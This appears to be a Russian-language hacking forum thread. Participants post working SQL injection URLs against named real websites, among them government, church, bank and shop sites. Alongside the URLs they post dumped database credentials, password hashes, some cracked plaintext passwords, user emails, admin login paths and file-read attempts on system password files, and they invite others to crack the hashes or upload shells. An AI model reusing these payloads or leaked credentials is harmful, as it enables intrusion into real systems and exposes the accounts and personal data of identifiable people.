admin:e54f5e626948378243ddc7fd8fb88752:pusikurac
================================================== =
http://www.churchilltrust.com.au/content.php?id=-54+union+select+1,2,3,convert(concat_ws(0x3a,usern ame,password),binary),5,6,7,8,9,0,1+from+adminuser s/*
http://www.churchilltrust.com.au/content.php?id=-54+union+select+1,2,3,convert(concat_ws(0x3a,usern ame,password),binary),5,6,7,8,9,0,1+from+users/*
4.1.11-Debian_4sarge7
admin:4dm1n
================================================== =
http://www.gamershood.com/game.php?id=-1255+union+select+1,2,concat_ws(0x3a,username,pass word,salt),4,5,6,7,8,9,0,1,2,3,4,5,6,7+from+user+l imit+21391,1/*
4.1.20-log
21к юзеров булки - md5(md5($pass).$salt)
GamersHood:e4d886385fb7b53083fadd97a66b5078:;0N
================================================== =
http://www.uainfo.com/?rubid=-70+union+select+1,2,3,4,5,6,7,8,concat(user,0x3a,p assword,0x3a,host),0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5 +from+mysql.user/*
root:773214e90eb99bdb:111
uainfo:1cdbd77479a6b181
5.0.37
http://www.uainfo.com/?rubid=-70+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,nam e,adPass,email,www,status),0,1,2,3,4,5,6,7,8,9,0,1 ,2,3,4,5+from+ads/*
67к юзверей
================================================== =
http://www.salta.gov.ar/ver_noticia.php?id=-6293+union+select+1,concat_ws(0x3a,user,password,h ost),3,4,5,6,7,8,9,0,1,2,3,4,5+from+mysql.user/*
5.0.26

ftpsigep:326bc18760bb7138:info777
ftpboletin:1723474445ad5325:
ftpsecmayores:6461d4e9239d87ba:lv426
root:*37CDEC361C71AE7488B38F326EB4E47B0E9071C8:
ftpamt:*3B4AA1C58CB4B241822483358B14ED70C830C33F:a mtweb
ftpdeportes:*2F6FD4EDD929DA2998595EA8F162F21AD2EFA FA5:
dbprensa3:*75812E11D73622956C8693C9164934DC38F4012 4:
ftpcerrillos:*C661E8BABAD3C854A461AD6A830C38C785FB E8BA:
ftpucc:*0A14D7147DA45C5B8BA525993480BC94B7F75A28:g x260
estadisticas:*426555DC02DB082487C32416E9326EDCA3F6 8E38:est123
ftpdgpt:*75E5018AC4C15AE017D4CD9B45AF4E53F42AEA05:
ipvuser:*33D85363B065BDB9BA1D6242CD4F5F9324C67094:
ftpregistro:*D626480368E2CEC93C5ABD6C9413125A3A54C 338:
ftpsalud:*A289157FE5C507B08970E7D15A183D29B57960ED :liga18
script:*8FD8A99335F1F8A3A24A3E1088EAA3C872EE65D8:s cript
juan:*7ABD7F0A2A70C30B46E318E3A647A90D21D7696C:mis 6524
jfg:*7541914222C92705D642485C0125B8F8618F0711:quel onio
ftpenresp:*864CD7CDBABFB1C493EAB982781CBB99BB48519 F:enteweb
ftpmuniyrigoyen:*D16B3D7319F09B3493F7F35E090A9EF6F 2477C26:
http://www.salta.gov.ar/ver_noticia.php?id=-6293+union+select+1,concat_ws(0x3a,apodo_usu,pass_ usu),3,4,5,6,7,8,9,0,1,2,3,4,5+from+amt.usuarios+l imit+0,1/*
ARIEL:pelikan
POLICIAS:VIAL
AMT:TAXI
================================================== =
http://www.saludsalta.gov.ar/ver-prevencion.php?id=-13+union+select+1,2,3,4,concat_ws(0x3a,user,passwo rd,host),6+from+mysql.user/*
root:*37CDEC361C71AE7488B38F326EB4E47B0E9071C8:loc alhost
http://www.saludsalta.gov.ar/ver-prevencion.php?id=-13+union+select+1,2,concat_ws(0x3a,apodo_usu,pass_ usu),4,5,6+from+amt.usuarios+limit+0,1/*
ARIEL:pelikan
POLICIAS:VIAL
AMT:TAXI

http://www.hofigal.eu/produse.php?id=-446+union+select+concat_ws(0x3a,version(),user(),d atabase()),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1 ,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0/*

Database Version: 4.1.22-standard-log
Database name: hofigal_hofigal
User name: hofigal_soft@ro5.globehosting.net
Tables: admin
users- user_id, username, password
hofigal:tazmanian
в таблице админ не смог подобрать колонки

www.hofigal.eu/admin

спасибо за внимание

пример для новичков
http://www.carpediemtransport.ro/stirea.php?id=-1+union+select+1,2,3,4/*
выводит поля ....вроде все норм, но при
http://www.carpediemtransport.ro/stirea.php?id=-1+union+select+1,concat_ws(user(),database(),versi on()),3,4/*

ошибка,многие забросили бы.... но не надо забывать про AES_ENCRYPT и AES_DECRYPT и конечно же LIMIT

а вот и результат

http://www.carpediemtransport.ro/stirea.php?id=1+UNION+SELECT+1,aes_decrypt(aes_enc rypt(concat_ws(0x3a,version(),database(),user()),0 x71),0x71),3,4+LIMIT+1,1/*

Database Version: 4.1.11-nt
Database name: carpediemtravel
User name: carpediem@localhost

жаль что не подобрал таблицы...
спасибо всем

http://www.apd.ro/proiect.php?id=-1+union+select+1,2,aes_decrypt(aes_encrypt(concat_ ws(version(),0x3a,database(),0x3a,user()),0x71),0x 71),4,5,6,7,8/*

Database Version: 4.1.11-nt
Database name: carpediemtravel
User name: carpediem@localhost

таблицы не подобрал...но сильно и не старался
http://www.remediiflorale.ro/remedii_detalii.php?ID=1+union+select+1,2,3,concat _ws(user(),database,version()),5,6,7,8,9+limit+1,1 /*

Database Version: 4.1.22-standard
Database name: remediif_remediiflorale
User name: remediif_cabat@localhost


подобрал только
phpbb_users
user_email, user_password , username

claudia.cabat@remediiflorale.ro:71d2313de7268950bb abc4bcea2db583:remediiflorale

хеш не брутил...кто имеет желание....пожалуйста
всем спасибо
http://www.gfialomita.ro/det_public.php?id=-1'+UNION+SELECT+1,concat_ws(0x3a,user(),version(), database()),3,4,5,6,7/*

Database Version: 4.1.21-log
Database name: gfialomita
User name: root@localhost

нашёл в базе mysql.user
password : user

7864ed0a46b1e475:root

пароль был найден на hashcracking.info за что огромное спасибо Lebed
pass : market
всем спасибо

http://www.lilstructuraldesign.ro/work.php?id=1+UNION+SELECT+1,2,3,4,concat_ws(0x3a, user(),version(),database()),6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30, 31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47 ,48,49,50,51,52,53,54,55,56,57,58+LIMIT+1,1/*

Database Version: 4.1.22-standard
Database name: lil_web
User name: lil_web@localhost

нашел users: id, pass, user

amro:b4af804009cb036a4ccdc33431ef9ac9: pass1234

www.lilstructuraldesign.ro/admin

пасс к сожалению не подходит
фтп у них публик...
спасибо всем


http://www.darvari.ro/index.php?id=2+UNION+SELECT+1,CONCAT_WS(0x3a,user( ),version(),database()),3,4,5,6,7,8,9+LIMIT+1,1/*

Database Version: 4.1.20-log
Database name: shdarvariro
User name: darvariro@193.226.140.172

нашёл phpbb_users
user_email, user_password, username

cristian_george1964@yahoo.com:$H$98LNbj3Sb0XchuuOz azRcHsqkYied0.:CristianSurdu
cristian_papusoiu82@yahoo.com:fde4fc933d4371c52414 7a4699484248:Papusoiu Cristian
adeladoloc@yahoo.com:282bbbfb69da08d03ff4bcf34a94b c53:Viorel Doloc
iulia.velican@gmail.com:d901619e37d52078ec5765b3df dd8680:florin-v
adi.oprea@schweighofer.ro:4dd77ecaf88620f5da8967bb d91d9506:adi.oprea
[n_vali68@yahoo.com:$H$9ud2wu9dbIjhULsv2FFVYqLcb/7XD70:vali nedelea

и так далее, хеши не брутил... милости просим всеx желающих

http://www.gimco-rentacar.ro/veicolo.php?id=1+union+select+1,concat_ws(0x3a,use r(),version(),database()),3,4,5,6,7+limit+1,1/*

интересный вывод..кто захочет тот поймёт.. таблы к сожаленю не подобрал

Database Version: 4.1.21-standard-log
Database name: gimco_cms
User name: gimco_cms@localhost


http://www.intorsura.ro/clubrestdisc/estaur.php?id=1+union+select+1,2,concat_ws(0x3a,us er(),database(),version()),4,5,6,7,8,9,10,11+limit +1,1

Database Version: 4.1.22-standard-log
Database name: intors_intorsura
User name: intors_jymmy5@localhost


admin
nume,parola
Joos:jooti1103
ЗЫ. Хорошо знать много языков.... иногда колонки попадаются и такие..переведённые

http://www.intorsura.ro/admin/utilizatori/login/admin.php

without password
http://www.3la3.ro/detalii_stire.php?id=31+UNION+SELECT+1,2,3,concat_ ws(0x3a,user(),version(),database()),5,6,7,8,9,10, 11,12,13+LIMIT+1,1/*

Database Version: 5.0.45-community
Database name: sportare_sportarena
User name: sportare_kadour@localhost


administratori:
drogo:c973dec0d6f378c500a1dadc14149887
valau:c973dec0d6f378c500a1dadc14149887
constu:e7b67b0bf3aa2a72dc31458acd5f905f
operator:08fbb70044e49261bb4d40262144c791:ziani
pedro:4a5970427c6a784b930b0668b1189c8b

http://www.3la3.ro/admin

спасибо за внимание


http://www.psc.ro/comunicate_detalii.php?id=1+UNION+SELECT+1,concat_ ws(0x3a,user(),version(),database()),3,4,5,6,7/*

Database Version: 4.1.20-log
Database name: netpscro
User name: pscro@193.226.140.172

таблы подобрать не смог


http://www.generatoare.ro/listare.php?id=1'+union+select+1,2,aes_decrypt(aes _encrypt(concat(0x3a,version(),0x3a,database(),0x3 a,user()),0x71),0x71),4,5+LIMIT+1,1/*

Database Version: 4.1.12
Database name: generatoare
User name: generat_oare@localhost

смотрим в хедере...или сурс откройте

users:
columns: id,email,nume,parola

http://www.corso-automobile.ro/detalii.php?id=1+UNION+SELECT+1,concat_ws(0x3a,use r(),version(),database()),3,4,5,6,7,8,9,10,11,12,1 3,14+LIMIT+1,1/*

Database Version: 5.0.45-community-log
Database name: delsoftr_corsoautomobile
User name: delsoftr_vlad@localhost

в БД >13 базочек... копайтесь сами.пароли там в открытом виде.удачи

delsoftr_adan
delsoftr_adan2
delsoftr_adantrans
delsoftr_autocentrusibiu
delsoftr_auto
delsoftr_autostock
delsoftr_autostyleWWW
delsoftr_autotest
delsoftr_autotest
delsoftr_delcar
delsoftr_delcar2
delsoftr_delcarmoreni
delsoftr_delsoft
delsoftr_demogestiune ......




http://www.topline.ro/stiri.php?id=1'+union+select+1,aes_decrypt(aes_enc rypt(concat_ws(0x3a,Version(),Database(),User()),0 x71),0x71),3,4,5+limit+1,1/*

Database Version: 5.0.18
Database name: topline
User name: root@localhost

в БД 2 базы
1.mysql
2.topline

в первой инфа о БД, юзер пасс..и т.д.и.т.п.
во вторй есть админы
вернее админ, так как он там один вроде

login: admin
password: parola123

http://www.topline.ro/admin

на сегодня всё..всем спасибо за проявленное внимание..ваш покорный слуга Горев

http://www.redlynx.com/index.php?id=493&newsId=-125+union+select+1,2,3,concat_ws(char(58),version( ),user(),database()),5,6,7/*
5.0.22/redlynxcom@10.0.0.205/redlynxcom
http://www.redlynx.com/index.php?id=493&newsId=-125+union+select+1,2,3,concat_ws(char(58),login,pa ssword,email,admin),5,6,7+from+iman_users/*
------------------------------------------------------------------------
http://www.avpkf.com/index.php?action=pages&id=-2+union+select+1,2,concat_ws(char(58),version(),us er(),database()),4/*
5.0.45-community/avpkfco_avangard@localhost/avpkfco_1
http://www.avpkf.com/index.php?action=pages&id=-2+union+select+1,2,concat_ws(char(58),id,email,pwd ),4+from+avgdusers/*
------------------------------------------------------------------------
http://www.iwdp.co.uk/profile.php?id=-1+union+select+1,concat_ws(char(58),version(),user (),database()),3,4,5,6,7,8,9,10,11/*
4.1.20-log/iwdp@localhost/iwdp
http://www.iwdp.co.uk/profile.php?id=-1+union+select+1,concat_ws(char(58),username,passw ord),3,4,5,6,7,8,9,10,11+from+users+limit+0,1/*
------------------------------------------------------------------------
http://www.ingnet.co.uk/productdetail.php?id=-518+union+select+1,2,3,4,concat_ws(char(58),versio n(),user(),database()),6,7,8,9/*
4.1.20-standard/pauling4_log1@localhost/pauling4_ingnetstock
http://www.ingnet.co.uk/productdetail.php?id=-518+union+select+1,2,3,4,concat(username,char(58), password),6,7,8,9+from+users/*
------------------------------------------------------------------------
http://www.lewesbaptistchurch.org.uk/default.php?id=-13+union+select+1,concat_ws(char(58),version(),use r(),database()),3,4+from+users/*
5.0.45/lewes@localhost/lewesbaptistchurch_eastgate
http://www.lewesbaptistchurch.org.uk/default.php?id=-13+union+select+1,concat_ws(char(58),username,pass word),3,4+from+users+limit+0,1/*
------------------------------------------------------------------------
http://www.matthew-james.co.uk/books.php?id=-32+union+select+1,concat_ws(char(58),version(),use r(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15--
5.0.51a-community/matthewj_main@localhost/matthewj_main
http://www.matthew-james.co.uk/books.php?id=-32+union+select+1,concat_ws(char(58),username,pass word),3,4,5,6,7,8,9,10,11,12,13,14,15+from+mj_user s+limit+151--
moodesign:sinead
PЗаходим на http://www.matthew-james.co.uk/login.php и вводим Username и Password. Воля! Мы в Админке
Я старался)) Говорят, что цвета немного глаза режут, но я уже ничего менять не буду))

Jeroenwijering.com - PR 8
http://www.jeroenwijering.com/?page=wizard&example=999999+UNION+SELECT+1,2,3,4,5,6,7,unhex(he x(version()))/*
Inderscience.com - PR 7
http://www.inderscience.com/mapper.php?id=99999+union+select+1,2,unhex(hex(ver sion()))/*
http://www.inderscience.com/mapper.php?id=99999+union+select+1,2,unhex(hex(con cat_ws(0x3a,user,password)))+from+mysql.user/*
http://www.inderscience.com/mapper.php?id=99999+union+select+1,2,unhex(hex(loa d_file(char(47,101,116,99,47,112,97,115,115,119,10 0))))/*
жаль не плучилось шелл залить.. фильтрует кавычки..(

Butv10.com - PR 6
http://www.butv10.com/series.php?id=999999+union+select+1,2,3,4,5,6,7,8, 9,10,11,12,13,14,15,16,unhex(hex(version())),18,19 ,20,21,22,23,24,25/*
Earthfiles.com - PR 6
http://www.earthfiles.com/news.php?ID=99999999+union+select+1,2,3,4--
чтобы получить вывод нужно заплатить..)) me платить не будет.)

Shocktillyoudrop.com - PR 6
http://www.shocktillyoudrop.com/news/topnews.php?id=999999+union+select+version(),2/*
Fm.gov.lv - PR 6
http://www.fm.gov.lv/index.php?id=-1+union+select+1/*
скуль...?

Fadetoblack.com - PR 5
http://fadetoblack.com/modules.php?op=modload&name=News&file=article&sid=25&mode=1%22

(c) VITAL (http://vital.h.com.ua)

http://www.cesvot.it/usr_view.php/ID=-1%20union%20select%201,2,3,4,5,6,7-- я тут вообще инъекции не увидел
http://www.freewebtemplates.com/template.php?id=3&start=99999' тут кстати тоже...

http://www.roviniete.ro/detalii_vignete_europa.php?id=1+union+select+1,con cat_ws(0x3a,user(),version(),database()),3+limit+1 ,1/*

Database Version: 5.0.45
Database name: rovini_roviniete
User name: rovini_usrrovi@localhost

admins :

dan:7c4014be271c668dffa7911537fc3203
rbd:8b6a8a4e9fd167ad9dfeabd502ebace3: makaveli

админку не нашел...
на морде есть логин для клиентов

http://www.santo-raphael.ro/product.php?id=1+union+select+1,2,3,4,5,6,7,8,9,10 ,11,12,concat_ws(0x3a,version(),user(),database()) ,14,15,16,17,18+limit+1,1/*


Database Version: 4.1.14
Database name: shop
User name: admin@localhost

tables
admin колонки которые подобрал не интересные: email,id, phone
mysql.user колонки pasword, user

admin:2ef439381b2bdf7b: galeon
usr_market:2ef439381b2bdf7b : galeon

админку не искал..на морде логин для клиентов

www.02.ru - Правоохранительный портал

_http://www.02.ru/zakon/index.php?id_mz=15+union+select+1,concat_ws(0x3a,u ser(),version(),database()),3,4/*


USER: ru183180_02ru@localhost
VERSION: 4.0.27-log
DATABASE: ru183180_02rudb

Они даже себя засчищать не хотят :eek:

http://www.slamdunk.ro/stire.php?id=-400+union+select+1,2,3,4,5,6,7,8,9/*

http://www.ccimm.ro/search/show.php?id=-131'+union+select+1,2,3,4,5,6,concat_ws(char(58),u sername,password),8,9,0,1,2,3,4,5+from+user/*

http://www.lexisnexis.ca/bookstore/bookinfo.php?pid=-20+union+select+1,cast(version()+as+binary),3,4,5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*

http://www.vip-gsm.ru/spec.php?id=-573'+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_w s(0x2F,user,password),13,14,15,16,17,18+from+mysql .user/*
Version: 4.1.18
User/Pass: root/40cdfeb7631887f0

K1nD[e]R, на вип джи эс эм у меня уже давно шелл лежит, там file_priv =Y b кавычки не экранируются, в ошибке путь виден, папка на заливку sql/images вроде,

Белорусский Республиканский ТЕАТР ЮНОГО ЗРИТЕЛЯ


http://tuz-by.com/viewperson.php?id=180%20union%20select%201,2,3,4,5 ,6,7,8,9,10/*

При инъекции в скрипте persons.php можно узнать немного больше

http://www.tuz-by.com/persons.php?type=1+union+select+1,2,version(),user (),5,6,7,8,database(),10--

VERSION(): 4.0.24_Debian-10sarge2-log
DATABASE(): tuzbycom
USER(): tuzbycom@localhost

Так же подвержен скуль-инъекции скрипт

http://www.tuz-by.com/viewpress.php?id=13+union+select+1,2,3,4,5,6,7--

http://shirley.ru/cat.php?id=-3+union+select+concat_ws(0x2F,uid,uname,pass),2+fr om+shir_users+limit+3,3/*
Version: 5.0.33

uname/pass : Алексей/c6f057b86584942e415435ffb1fa93d4
P.S юзаем (limit+x,x) для вывода юзеров=)

http://www.ixbt.com/news/news.php?id=-1+union+select+1,2,concat_ws(0x2F,name,password),v ersion(),5,6,7,8,9,10,11+from+user+limit+3,3/*
Version: 4.0.27
name/pass: Administrator/another_enter
P.S юзаем (limit+x,x) для вывода юзеров=)

Davinciinstitute.com - PR 6
http://www.davinciinstitute.com/page.php?ID=-1'+union+select+1,2,3,concat_ws(0x3a,LoginName,Pas sword),5,6+from+AdminUsers/*
как разшифровать? попробвал hex(ascii)=md5

Bouldertheater.com - PR 6
http://www.bouldertheater.com/event_detail.php?id=999999+UNION+SELECT+1,2,3,4,5, 6,7,8,9,10,11,12,13,14,15,table_name,17,18,19,20,2 1,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37, 38,39,40,41+from+information_schema.tables+limit+1 7,1--

Umpcportal.com - PR 6
http://www.umpcportal.com/products/product.php?id=9999999+union+select+version(),2,3, 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 ,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38/*
Linspire.com - PR 7
http://www.linspire.com/linspire_letter_archives.php?id=9999999+union+sele ct+1,version(),3,4/*
Allianceforbiz.com - PR 6
http://www.allianceforbiz.com/events/specific_event.php?id=999999+union+select+1,versio n(),3,4/*
Koleso.topof.ru - PR 4
http://koleso.topof.ru/testing_info.php?id=9999+union+select+1,2,concat_w s(0x3a,admin_login,admin_password),4,5,6,7+from+ko leso_ktopof.admins/*
Cccs.com - PR 5
http://www.cccs.com/index.php?id=99999+union+select+1,2,3/*
увы.. но для вывода нужно зарегатся..(

Да, чёта меня на метео потянуло...
gismeteo.ru

Google PR 6 / 10
Яндекс тИЦ 19000

http://avia.gismeteo.ru/avia.php?id=27612+union+select+1+limit+1,1--

Database Version: 4.1.1-alpha-standard
Database name: search
User name: root@localhost

Viperson.ru - PR 4
http://www.viperson.ru/wind.php?ID=999999+UNION+SELECT+AES_DECRYPT(AES_EN CRYPT(CONCAT(Version()),0x71),0x71)/*
Cyberthing.net - PR 3
http://www.cyberthing.net/video-play.php?id=9999+union+select+1,table_name,3,4,5,6 ,7+from+information_schema.tables/*
Dimi4
http://avia.gismeteo.ru/avia.php?id=27612+union+select+aes_decrypt(aes_enc rypt(load_file(0x2F6574632F706173737764),0x71),0x7 1)+limit+1,1--
load_file никто не отменял..)
http://avia.gismeteo.ru/avia.php?id=27612+union+select+aes_decrypt(aes_enc rypt(concat_ws(0x3a,user,password),0x71),0x71)+fro m+mysql.user+limit+1,1--
и это. но сдесь почемуто на рута пасса нету ;)

pr-cy.ru
http://pr-cy.ru/faq/-21+union+select+1,2,3.html5.0.51a-community-log
доступны только стандартные таблицы и одна таблица FAQ ..

Ну что же друзья...а вот и я

http://www.gathsports.com/productsingle.php?id=1%27+UNION+SELECT+1,2,concat_ ws(0x3a,user(),version(),database()),4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23,24/*

Database Version: 5.0.22
Database name: web56_db1
User name: web56_u1@localhost

в БД единственная интересная на мой взгляд таблица login с колонками username и password

там всего 2 записи
ric:letmein
sue:letmein

админку не искал...
всем спасибо

Ну а теперь предлагаю вашему вниманию сайт с ПР6, www.jurnalul.ro очень известный и популярный в Румынии журнал, на самом сайте я ничего интересного не нашел...но через суб домен... http://copiidisparuti.jurnalul.ro я обнаружил скулю и соответственно и база у них одна.Админ и редакция были мной уведомлены еще месяц назад, так как они ничего не придпренимают..выложил так сказать в паблик

http://copiidisparuti.jurnalul.ro/detalii.php?s=1&id=149+union+select+1,concat_ws(0x3a,user(),versio n(),database()),3,4,5,6,7,8,9+limit+1,1/*

Database Version: 5.0.24a
Database name: copiidisp
User name: jurnalul@localhost

В БД 2 базы но нам интересна база jurnalul_site где находится информация нужная нам..то есть админы

admins

admin_username, admin_password

admin:qZpD7%uJqdJ.
flori:nokia
claudiugamulescu:claudiu
diana:karakum
aleks:huinea

последний в записях админа скорее всего молдованин или руский который работает в редакции, так как пароль скажем так с русской спецификой.
Всем спасибо.

Пойдем дальше...
http://www.radiogaga.ro/listgalerii.php?idgalerie=1+union+select+1,2,aes_d ecrypt(aes_encrypt(concat_ws(version(),database(), user()),0x71),0x71),4,5,6,7,8,9/*

Database Version: 4.1.13a RDS Hosting Databases
Database name: radiogaga
User name: radiogaga@localhost

кроме phpbb_users не нашел ничего
user_password, username

6be414417e0001f12039083621f436cc:avitus----> Alamo97
41955c3830838c240729b92550c12dd9:Francisc Pataki
f07fa1d519bf547c76ba56b732c2cd27:Kraus Kinga
09909326d2ba3e970de66c159b05bdf6:Misi
81ef1753db31e4c85dbc18b9c751d336:OLi!
905492bc9379a5efde0923283fc82d00:gerbera51
bc9850b32b863fd80cdf7ef63c183759:gravamen_1686
b1932d548fa7208117e4d332c378c532:castigo1307


http://www.tailormadetours.com.au/emailtofriend.php?ID=-1+UNION+SELECT+concat_ws(0x3a,user(),version(),dat abase()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34, 35,36,37,38,39,40,41,42,43,44,45,46,47,48/*

Database Version: 5.0.46
Database name: ttours
User name: ttour@203.130.164.130


вывод в поле Your Message
В БД 3 базы :
test
test_cms_database
ttours

только в первой есть таблица users ..но в ней только
userid
username
emailaddress

3:shayne:shayne@adimpact.com.au
4:mike:mike@adimpact.com.au

у кого есть желание поковырятся..милости просим.Спасибо всем.

http://www.bankrollmob.com/forum.asp?mode=thread&id=-32278%20union%20select%20pwd,2%20from%20admin

Password: 75ea14129638ac5c2bd34c0a615dfe7f

Please crack for me password. Help me

PR 4
http://www.blackgospelpromo.com/viewpromo.php?promo_id=-1+union+select+1,2,concat(version(),0x3a3a,user(), 0x3a3a,database()),4,5,6,7,8,9,10,11,12,13,14,15,1 6/*
version(): 5.0.45-community
user(): blackgos_test@localhost
database(): blackgos_bgppromos
http://www.blackgospelpromo.com/admin/contest.php тут есть кое что интересное=)

доступ к information_schema закрыт..
Я открыл его :)
_http://www.blackgospelpromo.com/viewpromo.php?promo_id=-1+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12 ,13,14,15,16+from+information_schema.tables+limit+ 17,1/*
Таблица admin_user в титле
Сам ковыряй, если надо :)
_http://www.blackgospelpromo.com/viewpromo.php?promo_id=-1+union+select+1,2,concat(user_name,0x3a,user_pass ),4,5,6,7,8,9,10,11,12,13,14,15,16+from+admin_user/*
j1prophet:BEAtrice

аа.. ступил... просто поставил в строку information_schma.tables... спасибо=)

Allnight.ru - PR 3
http://www.allnight.ru/news/?category=1'+union+select+1,2,version(),4,5,6,7,8, 9,10,11,12/*

www.photo.buyyourstockphotos.com
http://www.photo.buyyourstockphotos.com/user.html?uid=-5+union+select+1,concat_ws(0x3a3a,version(),user() ,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27--
version(): 5.0.51a-3ubuntu5.1
user(): buystock@localhost
database(): buystock

file_priv к сожалению нет..
так как версия пятая, то есть база information_schema.. из нее берем названия таблиц:http://www.photo.buyyourstockphotos.com/user.html?uid=-5+union+select+1,table_name,3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from +information_schema.tables+limit+1,1--
есть табличка users.. смотрим какие в ней колонки
http://www.photo.buyyourstockphotos.com/user.html?uid=-5+union+select+1,column_name,3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+fro m+information_schema.columns+where+table_name=0x75 73657273+limit+1,1--
и делаем вывод из таблицы
http://www.photo.buyyourstockphotos.com/user.html?uid=-5+union+select+1,concat_ws(0x3a3a,user,pass),3,4,5 ,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 ,24,25,26,27+from+buystock.users--
все очень просто=)

== Анализ Сайта kreit.ru ==
Яндекс: тИЦ - 110, Страниц - 313
Google: PR - 2
ЯК: Есть;
=====================================
http://kreit.ru/templates/allnews.php?pid=999999999+union+select+1,concat_ws (0x3a3a,user(),version(),database()),3/*
kreit@jet.mplik.ru::5.0.41-log::kreit
17:extradata
18:ipublisher_email
19:ipublisher_faq
20:ipublisher_faq_lines
21:ipublisher_files
22:ipublisher_materials
23:ipublisher_materials_types
24:ipublisher_modules
25:ipublisher_news
26:ipublisher_news_lines
27:ipublisher_publishes
28:ipublisher_publishes_links
29:ipublisher_tekon17
30:ipublisher_tekon19
31:ipublisher_templates
32:ipublisher_textdocuments
33:ipublisher_vars
34:itaf_forum
35:itaf_group
36:itaf_message
37:itaf_mod
38:itaf_subscribe
39:itaf_thread
40:itaf_user
41:itaf_whois
42:order_all


http://kreit.ru/templates/allnews.php?pid=999999999+union+select+1,concat_ws (0x3a,user_name,user_pass,user_mail,user_icq),3+fr om+itaf_user+limit+0,1/*
merlin_sw:2e782c85379a326e:merlin_sw@mail.ru:
135 записей, типа хэша Mysql5

http://www.dpmhi.com/news.php?id=-1+union+select+all+1,2,concat_ws(0x3a,version(),us er(),database()),4,5--

http://www.worldwidehealthcenter.net/category.php?prod=-1+union+select+all+1,2,3,4,5,6,7,8,9,10,11,darkc0d e,13,14,15,16,17,18

http://www.jleen.com/page.php?id=-1+union+select+all+1,concat_ws(0x3a,version(),user (),database()),3--

http://www.calbank.net/newsite/products&services/index.php?id=-1+union+select+all+1,concat_ws(0x3a,version(),user (),database()),3,4,5,6,7,8,9--


http://firstfreedombank.com/PRstory.php?id=-1+union+select+all+1,concat_ws(0x3a,version(),user (),database()),3,4,5--


http://www.atbskimmers.com/product.php?id=-1+union+select+all+1,2,3,4,concat_ws(0x3a,version( ),user(),database()),6,7,8,9,10,11,12,13,14,15,16, 17,18,1 9,20,21,22,23,24,25,26--


http://www.pokerdvd.net/product.php?id=-1+union+select+all+1,2,3,concat_ws(0x3a,version(), user(),database()),5,6,7,8,9,10,11,12,13,14,15--

http://www.asynt.com/product_ranges_view.php?ID=-1+union+select+all+1,2,3,4,concat_ws(0x3a,version( ),user(),database()),6,7,8,9--

http://www.mofsupply.com/productDetail.php?id=-1+union+select+all+1,2,3,darkc0de,5,6,7,8,9,10,11, 12,13,14,15,16,17


http://www.texasalliance.org/houstonwildcatters.php?id=-1+union+select+all+1,concat_ws(0x3a,version(),user (),database()),3,4,5,6,7,8,9,10,11,12,13--

http://www.icd-usa.com/news1.php?id=-8+UNION+ALL+SELECT+1,2,@@version,4,5,6,7,8,9,10,11--
http://www.cnet.org.uk/news1.php?ID=-60+UNION+ALL+SELECT+1,@@version,3,4--
http://www.corporatedevelopmint.com/news1.php?ID=-152+UNION+ALL+SELECT+1,2,3,@@version,5,6,7,8,9,10, 11,12,13,14--
http://effluxtechnologies.com/news1.php?ID=-8+UNION+ALL+SELECT+1,@@version,3,4,5--
http://www.michaelpollan.com/article.php?id=-87+UNION+ALL+SELECT+1,@@version,3,4,5,6,7,8,9,10--
http://www.virtuosimedia.com/resource.php?id=0&cat=-1+UNION+ALL+SELECT+1,@@version,3,4--
http://www.guerrillanews.com/articles/article.php?id=-717+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,@@versio n,12,13,14,15,16,17,18,19,20,21,22,23--
http://www.etleboro.com/read.php?id=-396+UNION+ALL+SELECT+1,@@version,3,4,5,6,7,8,9--
http://www.syroil.com/news1.php?id=-8+UNION+ALL+SELECT+1,2,@@version--
http://www.lavocedellevoci.it/news1.php?id=-80+UNION+ALL+SELECT+1,2,3,4,@@version,6--
http://www.lavocedellevoci.it/grandifirme1.php?id=-20+UNION+ALL+SELECT+1,2,@@version,4,5--
http://www.allfungames.com/games.php?id=-8+UNION+ALL+SELECT+1,@@version,3,4,5,6,7,8,9,10,11 ,12,13--
http://www.warnickart.com/posters/art.php?id=-78+UNION+ALL+SELECT+1,@@version,3,4,5,6,7,8,9,10,1 1,12,13--
http://www.neltnercreative.com/advertising/art.php?id=-57+UNION+ALL+SELECT+1,2,@@version,4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20--
http://www.purdes.com/blog/art.php?id=-164+UNION+ALL+SELECT+1,@@version,3,4,5,6,7,8--

Антибоян обновлен, не забываем проверять свои инжекты.
Так же обращаю внимание на то что я перенес лист на другой хостинг;
http://constant1ne.by.ru/sqls.html - корневой пост отредактирован
Отдельное спасибо юзерам z01b и gisTy за помощь

PR 3
http://www.menunsk.ru/places.php?id=0)+union+select+table_name,2+from+in formation_schema.tables/*

http://www.business.su/kat.php?goroda=-104+union+select+concat_ws(0x3a,version(),user(),d atabase())/*

Version:4.0.27-standard
User:business_locuser@localhost
Database:business_mbase

таблички к сожалению не подобрал

2 gangs сюда постим только раскрученные скули...

Может боян...
http://www.volnorez.ru/news_comments.php?news_id=-75+union+select+1,2,3,4,user(),5,6/*
http://www.geninform.ru/index.php?category_id=-75+union+select+user()/*

